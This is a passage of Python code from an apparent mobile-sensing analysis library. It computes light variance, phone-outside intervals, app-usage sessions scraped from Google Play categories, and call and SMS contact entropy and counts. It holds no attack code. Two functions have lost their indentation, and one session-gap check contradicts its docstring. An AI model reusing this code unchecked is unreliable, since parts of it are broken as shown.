                                     offset=stream_offset, sample=np.mean(samples)))
    return windows
def variance_ambient_light_daily(self, lightdata: List[DataPoint], data_frequency: float=16,
                                 minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Variance of ambient light (in flux) over a whole day.

    Returns None when fewer than minimum_data_percent% (default 40%) of the
    expected samples (data_frequency per second over 24 hours) are present.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Variance of ambient light over a 1 day window
    :rtype: List(DataPoint) or None
    """
    required_samples = data_frequency * 24 * 60 * 60 * minimum_data_percent / 100
    if len(lightdata) < required_samples:
        return None
    first = lightdata[0]
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(first.start_time.date(), datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=first.start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    daily_variance = np.var([point.sample for point in lightdata])
    return [DataPoint(day_begin, day_close, first.offset, daily_variance)]
def variance_ambient_light_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
                                  minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Variance of ambient light (in flux) for each one hour window of a day.

    Hour windows holding fewer than minimum_data_percent% (default 40%) of the
    expected samples (data_frequency per second over one hour) produce no data point.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Variance of ambient light over 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not lightdata:
        return None
    required_samples = data_frequency * 60 * 60 * minimum_data_percent / 100
    # Midnight of the first sample's day (tz-aware copy).
    midnight = copy.deepcopy(lightdata[0].start_time)
    midnight = midnight.replace(hour=0, minute=0, second=0, microsecond=0)
    stream_offset = lightdata[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        samples = [p.sample for p in lightdata
                   if window_start <= p.start_time <= window_end]
        if len(samples) >= required_samples:
            hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                    offset=stream_offset, sample=np.var(samples)))
    return hourly
def variance_ambient_light_four_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
                                       minimum_data_percent: float=40) -> List[DataPoint]:
    """
    Variance of ambient light (in flux) for each four hour window of a day.

    Windows holding fewer than minimum_data_percent% (default 40%) of the expected
    samples (data_frequency per second over four hours) produce no data point.

    :param List(DataPoint) lightdata: Phone ambient light DataStream
    :param float data_frequency: Expected number of data points per second
    :param float minimum_data_percent: Minimum percent of data that must be available
    :return: Variance of ambient light over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not lightdata:
        return None
    required_samples = data_frequency * 4 * 60 * 60 * minimum_data_percent / 100
    # Midnight of the first sample's day (tz-aware copy).
    midnight = copy.deepcopy(lightdata[0].start_time)
    midnight = midnight.replace(hour=0, minute=0, second=0, microsecond=0)
    stream_offset = lightdata[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        samples = [p.sample for p in lightdata
                   if window_start <= p.start_time <= window_end]
        if len(samples) >= required_samples:
            windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                     offset=stream_offset, sample=np.var(samples)))
    return windows
def calculate_phone_outside_duration(self, data: List[DataPoint],
                                     phone_inside_threshold_second: float=60) -> List[DataPoint]:
    """
    Finds the duration (start_time and end_time) of phone outside (not in pocket or purse).
    It uses a threshold (phone_inside_threshold_second), such that, if there is a duration of
    at least this amount of consecutive time the phone proximity is 0, then this will be a
    period of phone inside.

    Proximity sample semantics as used here: sample == 0 means phone inside
    (covered), sample > 0 means phone outside.

    :param List(DataPoint) data: Phone proximity Datastream
    :param float phone_inside_threshold_second: Threshold in seconds, that is allowed with
            proximity 0 with phone outside
    :return: DataPoints containing intervals of phone outside
    :rtype: List(DataPoint)
    """
    outside_data = []
    threshold = timedelta(seconds=phone_inside_threshold_second)
    L = len(data)
    i = 0
    # Skip the leading run of zero-proximity (inside) samples.
    while i < L and data[i].sample == 0:
        i += 1
    if i == L:
        # Stream is entirely zeros: no outside interval at all.
        return outside_data
    # Start of the first candidate "outside" interval.
    start = data[i].start_time
    while i < L:
        # Consume the run of nonzero (outside) samples.
        while i < L and data[i].sample > 0:
            i += 1
        if i == L:
            # Stream ended while the phone was still outside; close the interval
            # at the last observed sample.
            outside_data.append(DataPoint(start, data[i - 1].start_time, data[i - 1].offset, "Outside"))
            break
        # First timestamp of the following zero run.
        cur = data[i].start_time
        # Consume the run of zero (inside) samples.
        while i < L and data[i].sample == 0:
            i += 1
        # If the zero run lasted at least `threshold` (or the stream ended),
        # the outside interval ended at `cur`; otherwise the short zero run is
        # ignored and the current outside interval continues.
        # NOTE(review): this append uses data[0].offset while the end-of-stream
        # branch above uses data[i - 1].offset — presumably equivalent for a
        # single-device stream, but worth confirming.
        if i == L or i < L and data[i].start_time - cur >= threshold:
            outside_data.append(DataPoint(start, cur, data[0].offset, "Outside"))
            if i < L:
                # Next outside interval begins at the first nonzero sample.
                start = data[i].start_time
    return outside_data
# lru_cache memoizes results per (self, appid) so repeated lookups for the same
# package skip the network round trip.
# NOTE(review): lru_cache on an instance method keeps `self` alive for the cache's
# lifetime and keys on the instance — acceptable for a long-lived singleton,
# otherwise consider caching on a helper; verify against how this class is used.
@lru_cache(maxsize=256)
def get_app_category(self, appid: str) -> List[str]:
    """
    Fetch and parse the google play store page of the android app
    and return the category. If there are multiple category it will
    return the first one in the webpage. Only for the GAME category
    it will return the sub-category also.

    :param str appid: package name of an app
    :return: [package_name, category (if exists, otherwise None) ,
    app_name (if exists, otherwise None), sub_category (if exists, otherwise None)]
    :rtype: List(str)
    """
    appid = appid.strip()
    # Hard-coded answer for a package whose store page lookup is known-problematic.
    if appid == "com.samsung.android.messaging":
        return [appid, "Communication", "Samsung Message", None]
    url = "https://play.google.com/store/apps/details?id=" + appid
    # External cache lookup is currently disabled (commented out), so
    # cached_response is always None and the `else` branch below is unreachable.
    cached_response = None
    #cached_response = self.CC.get_cache_value(appid)
    response = None
    if cached_response is None:
        try:
            # Throttle requests to the store to avoid rate limiting.
            time.sleep(2.0)
            self.CC.logging.log('%s not found in cache.' % (appid))
            response = urlopen(url)
        except Exception:
            # Any fetch failure degrades to "category unknown" for this app.
            toreturn = [appid, None, None, None]
            objstr = base64.b64encode(pickle.dumps(toreturn))
            #self.CC.set_cache_value(appid, objstr.decode())
            return toreturn
    else:
        # NOTE(review): pickle.loads on cached bytes — safe only if the cache is
        # trusted/internal; confirm before re-enabling the cache path.
        return pickle.loads(base64.decodebytes(cached_response.encode()))
    # Scrape category, app title and category link out of the store page HTML.
    soup = BeautifulSoup(response, 'html.parser')
    text = soup.find('span', itemprop='genre')
    name = soup.find('div', class_='id-app-title')
    cat = soup.find('a', class_='document-subtitle category')
    if cat:
        # Category id is the last path segment of the category link.
        category = cat.attrs['href'].split('/')[-1]
    else:
        category = None
    toreturn = None
    if category and category.startswith('GAME_'):
        # Games get the generic "Game" category plus their genre as sub-category.
        toreturn = [appid, "Game", str(name.contents[0]) if name else None, str(text.contents[0])]
    elif text:
        toreturn = [appid, str(text.contents[0]), str(name.contents[0]) if name else None, None]
    else:
        toreturn = [appid, None, str(name.contents[0]) if name else None, None]
    # Persist the (pickled, base64-encoded) result in the shared cache.
    objstr = base64.b64encode(pickle.dumps(toreturn))
    self.CC.set_cache_value(appid, objstr.decode())
    return toreturn
def get_appusage_duration_by_category(self, appdata: List[DataPoint], categories: List[str],
appusage_gap_threshold_seconds: float=120) -> List:
"""
Given the app category, it will return the list of duration when the app was used.
It is assumed that if the gap between two consecutive data points with same app usage
is within the appusage_gap_threshold_seconds time then, the app usage is in same session.
:param List(DataPoint) appdata: App category data stream
:param List(str) categories: List of app categories of which the usage duration should be calculated
:param float appusage_gap_threshold_seconds: Threshold in seconds, which is the gap allowed between two
consecutive DataPoint of same app
:return: A list of intervals of the given apps (categories) usage [start_time, end_time, category]
:rtype: List
"""
appdata = sorted(appdata, key=lambda x: x.start_time)
appusage = []
i = 0
threshold = timedelta(seconds=appusage_gap_threshold_seconds)
while i < len(appdata):
d = appdata[i]
category = d.sample[1]
if category not in categories:
i += 1
continue
j = i + 1
while j < len(appdata) and d.sample == appdata[j].sample \
and appdata[j - 1].start_time + threshold <= appdata[j].start_time:
j += 1
if j > i + 1:
appusage.append([d.start_time, appdata[j - 1].start_time, category])
i = j - 1
i += 1
return appusage
def appusage_interval_list(self, data: List[DataPoint], appusage: List) -> List[int]:
"""
Helper function to get screen touch gap for specific app categories
:param List(DataPoint) data: Phone screen touch data stream
:param List appusage: list of app usage duration of specific app categories of the form
[start_time, end_time, category]
:return: A list of integers containing screen touch gap as in touch screen timestamp unit (milliseconds)
:rtype: List(int)
"""
ret = []
i = 0
for a in appusage:
while i < len(data) and data[i].start_time < a[0]:
i += 1
last = 0
while i < len(data) and data[i].start_time <= a[1]:
if last > 0:
ret.append(int(data[i].sample - last))
last = data[i].sample
i += 1
return ret
def label_appusage_intervals(self, data: List[DataPoint], appusage: List, intervals: List,
                             interval_label: List[str]) -> List[DataPoint]:
    """
    Helper function to label screen touch gaps within app usage sessions of a
    fixed app category.

    :param List(DataPoint) data: Phone touch screen data stream
    :param List appusage: list of app usage durations of specific app categories of the form
        [start_time, end_time, category]
    :param intervals: list of [min, max] gap ranges in seconds, one per entry in
        interval_label
    :param interval_label: list of possible types of screen touch, e.g.
        [typing, pause, reading, unknown]
    :return: Labelled touch intervals; consecutive intervals that share a
        boundary and a label are merged into one DataPoint
    :rtype: List(DataPoint)
    """
    ret = []
    i = 0
    for a in appusage:
        # Advance to the first touch event inside this usage session.
        while i < len(data) and data[i].start_time < a[0]:
            i += 1
        last = None
        while i < len(data) and data[i].start_time <= a[1]:
            if last:
                # Gap (seconds) between this touch and the previous one.
                diff = (data[i].start_time - last).total_seconds()
                # First matching [min, max] range decides the label.
                for j in range(len(interval_label)):
                    if intervals[j][0] <= diff <= intervals[j][1]:
                        if len(ret) > 0:
                            # Merge with the previous labelled interval when it
                            # ends exactly where this one starts and carries the
                            # same label; otherwise keep both.
                            last_entry = ret.pop()
                            if last_entry.end_time == last and last_entry.sample == interval_label[j]:
                                ret.append(DataPoint(start_time=last_entry.start_time,
                                                     end_time=data[i].start_time, offset=last_entry.offset,
                                                     sample=last_entry.sample))
                            else:
                                ret.append(last_entry)
                                ret.append(DataPoint(start_time=last, end_time=data[i].start_time,
                                                     offset=data[i].offset, sample=interval_label[j]))
                        else:
                            ret.append(DataPoint(start_time=last, end_time=data[i].start_time,
                                                 offset=data[i].offset, sample=interval_label[j]))
                        break;
            last = data[i].start_time
            i += 1
    return ret
def process_appusage_day_data(self, user_id: str, appcategorydata: List[DataPoint],
                              input_appcategorystream: DataStream):
    """
    Processing all app usage by category modules: computes per-category usage
    sessions for one day and persists them as two derived streams
    (a per-day summary dict and one DataPoint per session).

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) appcategorydata: App category data stream
    :param DataStream input_appcategorystream: DataStream object of app category stream
    :return:
    """
    data = {}
    category_datapoints = []
    try:
        # Distinct non-empty categories present in the day's stream.
        categories = list(set([y.sample[1] for y in appcategorydata if y.sample[1]]))
        for c in categories:
            # Usage sessions for this category; up to 300s gaps are allowed
            # within one session.
            d = self.get_appusage_duration_by_category(appcategorydata, [c], 300)
            if d:
                newd = [{"start_time": x[0], "end_time": x[1]} for x in d]
                data[c] = newd
                for interval in d:
                    category_datapoints.append(DataPoint(interval[0], interval[1], appcategorydata[0].offset, c))
        if data:
            # One summary DataPoint spanning the whole day (midnight .. 23:59:59.999999),
            # in the stream's timezone.
            st = appcategorydata[0].start_time.date()
            start_time = datetime.datetime.combine(st, datetime.time.min)
            start_time = start_time.replace(tzinfo=appcategorydata[0].start_time.tzinfo)
            end_time = datetime.datetime.combine(st, datetime.time.max)
            end_time = end_time.replace(tzinfo=appcategorydata[0].start_time.tzinfo)
            dp = DataPoint(start_time, end_time, appcategorydata[0].offset, data)
            self.store_stream(filepath="appusage_duration_by_category.json",
                              input_streams=[input_appcategorystream], user_id=user_id,
                              data=[dp], localtime=False)
        if category_datapoints:
            self.store_stream(filepath="appusage_by_category.json",
                              input_streams=[input_appcategorystream], user_id=user_id,
                              data=category_datapoints, localtime=False)
    except Exception as e:
        # Best-effort: log and continue; a failure here must not abort the
        # caller's processing of other feature modules.
        self.CC.logging.log("Exception:", str(e))
        self.CC.logging.log(str(traceback.format_exc()))
def get_contact_entropy(self, data: List[str]) -> float:
    """
    Compute the Shannon entropy (natural log) of a list of contacts.

    BUGFIX: previously this computed -sum(f * log(f)) over raw counts f, which
    is not entropy (it is negative whenever any contact repeats). Counts are
    now normalized to probabilities, yielding proper Shannon entropy: 0 when
    all contacts are identical (or the list is empty), log(k) for k equally
    frequent contacts.

    :param List(str) data: List of contacts
    :return: Entropy of the given contact list
    :rtype: float
    """
    if not data:
        return 0
    # Frequency of each distinct contact.
    counts = {}
    for contact in data:
        counts[contact] = counts.get(contact, 0) + 1
    total = len(data)
    entropy = 0.0
    for freq in counts.values():
        p = freq / total
        entropy -= p * math.log(p)
    return entropy
def get_call_daily_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call contacts for a whole day.

    :param List(DataPoint) data: Phone call number data stream
    :return: Entropy of phone call for 1 day window
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(data[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=data[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    day_entropy = self.get_contact_entropy([d.sample for d in data])
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=data[0].offset, sample=day_entropy)]
def get_call_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call contacts for each hour in a day. Hours without any
    call produce no data point.

    :param List(DataPoint) data: Phone call number data stream
    :return: Entropy of phone call for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        numbers = [d.sample for d in data
                   if window_start <= d.start_time <= window_end]
        if numbers:
            hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                    offset=stream_offset,
                                    sample=self.get_contact_entropy(numbers)))
    return hourly
def get_call_four_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call contacts for each four hour window in a day. Windows
    without any call produce no data point.

    :param List(DataPoint) data: Phone call number data stream
    :return: Entropy of phone call for 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        numbers = [d.sample for d in data
                   if window_start <= d.start_time <= window_end]
        if numbers:
            windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                     offset=stream_offset,
                                     sample=self.get_contact_entropy(numbers)))
    return windows
def get_sms_daily_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of SMS contacts for a whole day.

    :param List(DataPoint) data: SMS number data stream
    :return: Entropy of sms for 1 day window
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(data[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=data[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    day_entropy = self.get_contact_entropy([d.sample for d in data])
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=data[0].offset, sample=day_entropy)]
def get_sms_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of SMS contacts for each hour of a day. Hours without any SMS
    produce no data point.

    :param List(DataPoint) data: SMS number data stream
    :return: Entropy of SMS for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        numbers = [d.sample for d in data
                   if window_start <= d.start_time <= window_end]
        if numbers:
            hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                    offset=stream_offset,
                                    sample=self.get_contact_entropy(numbers)))
    return hourly
def get_sms_four_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of SMS contacts for each four hour window in a day. Windows without
    any SMS produce no data point.

    :param List(DataPoint) data: SMS number data stream
    :return: Entropy of SMS for 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        numbers = [d.sample for d in data
                   if window_start <= d.start_time <= window_end]
        if numbers:
            windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                     offset=stream_offset,
                                     sample=self.get_contact_entropy(numbers)))
    return windows
def get_call_sms_daily_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call and SMS contacts (combined) for a day.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Entropy of phone call and SMS for 1 day windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(merged[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=merged[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    day_entropy = self.get_contact_entropy([p.sample for p in merged])
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=merged[0].offset, sample=day_entropy)]
def get_call_sms_hourly_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call and SMS contacts (combined) for each one hour window
    in a day. Windows without any event produce no data point.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Entropy of phone call and SMS for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(merged[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=merged[0].start_time.tzinfo)
    stream_offset = merged[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        numbers = [p.sample for p in merged
                   if window_start <= p.start_time <= window_end]
        if numbers:
            hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                    offset=stream_offset,
                                    sample=self.get_contact_entropy(numbers)))
    return hourly
def get_call_sms_four_hourly_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Entropy of phone call and SMS contacts (combined) for each four hour window
    in a day. Windows without any event produce no data point.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Entropy of phone call and SMS for 4 hour windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(merged[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=merged[0].start_time.tzinfo)
    stream_offset = merged[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        numbers = [p.sample for p in merged
                   if window_start <= p.start_time <= window_end]
        if numbers:
            windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                     offset=stream_offset,
                                     sample=self.get_contact_entropy(numbers)))
    return windows
def get_total_call_daily(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls in a day.

    :param List(DataPoint) data: Phone call number data stream
    :return: Number of phone calls in a day
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(data[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=data[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=data[0].offset, sample=len(data))]
def get_total_call_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls for each hour in a day. A DataPoint is emitted for
    every hour, including hours with zero calls.

    :param List(DataPoint) data: Phone call number data stream
    :return: number of phone calls for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        count = sum(1 for d in data if window_start <= d.start_time <= window_end)
        hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                offset=stream_offset, sample=count))
    return hourly
def get_total_call_four_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls for each four hour window in a day. A DataPoint is
    emitted for every window, including windows with zero calls.

    :param List(DataPoint) data: Phone call number data stream
    :return: number of phone calls for 4 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        count = sum(1 for d in data if window_start <= d.start_time <= window_end)
        windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                 offset=stream_offset, sample=count))
    return windows
def get_total_sms_daily(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of SMS in a day.

    :param List(DataPoint) data: SMS number data stream
    :return: Number of SMS in a day
    :rtype: List(DataPoint)
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(data[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=data[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=data[0].offset, sample=len(data))]
def get_total_sms_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of SMS for each hour in a day. A DataPoint is emitted for every
    hour, including hours with zero messages.

    :param List(DataPoint) data: SMS number data stream
    :return: number of sms for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        count = sum(1 for d in data if window_start <= d.start_time <= window_end)
        hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                offset=stream_offset, sample=count))
    return hourly
def get_total_sms_four_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
    """
    Number of SMS for each four hour window in a day. A DataPoint is emitted
    for every window, including windows with zero messages.

    :param List(DataPoint) data: SMS number data stream
    :return: number of SMS for 4 hour windows
    :rtype: List(DataPoint)
    """
    if not data:
        return None
    # Midnight of the first sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(data[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=data[0].start_time.tzinfo)
    stream_offset = data[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        count = sum(1 for d in data if window_start <= d.start_time <= window_end)
        windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                 offset=stream_offset, sample=count))
    return windows
def get_total_call_sms_daily(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls and SMS (combined) for a day.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Number of phone and SMS in 1 day windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    day_begin = datetime.datetime.combine(merged[0].start_time.date(),
                                          datetime.datetime.min.time())
    day_begin = day_begin.replace(tzinfo=merged[0].start_time.tzinfo)
    day_close = day_begin + datetime.timedelta(hours=23, minutes=59)
    return [DataPoint(start_time=day_begin, end_time=day_close,
                      offset=merged[0].offset, sample=len(merged))]
def get_total_call_sms_hourly(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls and SMS (combined) for each one hour window of a day.
    A DataPoint is emitted for every hour, including hours with zero events.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Number of phone and SMS for 1 hour windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(merged[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=merged[0].start_time.tzinfo)
    stream_offset = merged[0].offset
    hourly = []
    for hour in range(24):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(minutes=59)
        count = sum(1 for p in merged if window_start <= p.start_time <= window_end)
        hourly.append(DataPoint(start_time=window_start, end_time=window_end,
                                offset=stream_offset, sample=count))
    return hourly
def get_total_call_sms_four_hourly(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
    """
    Number of phone calls and SMS (combined) for each four hour window of a day.
    A DataPoint is emitted for every window, including windows with zero events.

    :param List(DataPoint) calldata: Phone call number data stream
    :param List(DataPoint) smsdata: SMS number data stream
    :return: Number of phone and SMS in 4 hour windows
    :rtype: List(DataPoint) or None
    """
    merged = calldata + smsdata
    if not merged:
        return None
    merged.sort(key=lambda p: p.start_time)
    # Midnight of the earliest sample's day, keeping its timezone.
    midnight = datetime.datetime.combine(merged[0].start_time.date(),
                                         datetime.datetime.min.time())
    midnight = midnight.replace(tzinfo=merged[0].start_time.tzinfo)
    stream_offset = merged[0].offset
    windows = []
    for hour in range(0, 24, 4):
        window_start = midnight.replace(hour=hour)
        window_end = window_start + datetime.timedelta(hours=3, minutes=59)
        count = sum(1 for p in merged if window_start <= p.start_time <= window_end)
        windows.append(DataPoint(start_time=window_start, end_time=window_end,
                                 offset=stream_offset, sample=count))
    return windows
def process_callsmsnumber_day_data(self, user_id: str, call_number_data: List[DataPoint],
                                   sms_number_data: List[DataPoint], input_callstream: DataStream,
                                   input_smsstream: DataStream):
    """
    Process all phone call number and SMS number related modules.

    Each feature is computed inside its own try/except so a failure in one
    feature never blocks the others; failures are logged. A feature's output is
    stored only when it produced data.

    :param str user_id: UUID of the stream owner
    :param List(DataPoint) call_number_data: Phone call number stream
    :param List(DataPoint) sms_number_data: SMS number stream
    :param DataStream input_callstream: DataStream object of phone call number
    :param DataStream input_smsstream: DataStream object of SMS call number
    :return:
    """
    # (feature method, argument tuple, output metadata file). Every output
    # lists BOTH input streams as provenance, matching the original behavior
    # even for call-only / sms-only features.
    features = [
        (self.get_call_sms_daily_entropy, (call_number_data, sms_number_data), "call_sms_daily_entropy.json"),
        (self.get_call_sms_hourly_entropy, (call_number_data, sms_number_data), "call_sms_hourly_entropy.json"),
        (self.get_call_sms_four_hourly_entropy, (call_number_data, sms_number_data), "call_sms_four_hourly_entropy.json"),
        (self.get_call_daily_entropy, (call_number_data,), "call_daily_entropy.json"),
        (self.get_call_hourly_entropy, (call_number_data,), "call_hourly_entropy.json"),
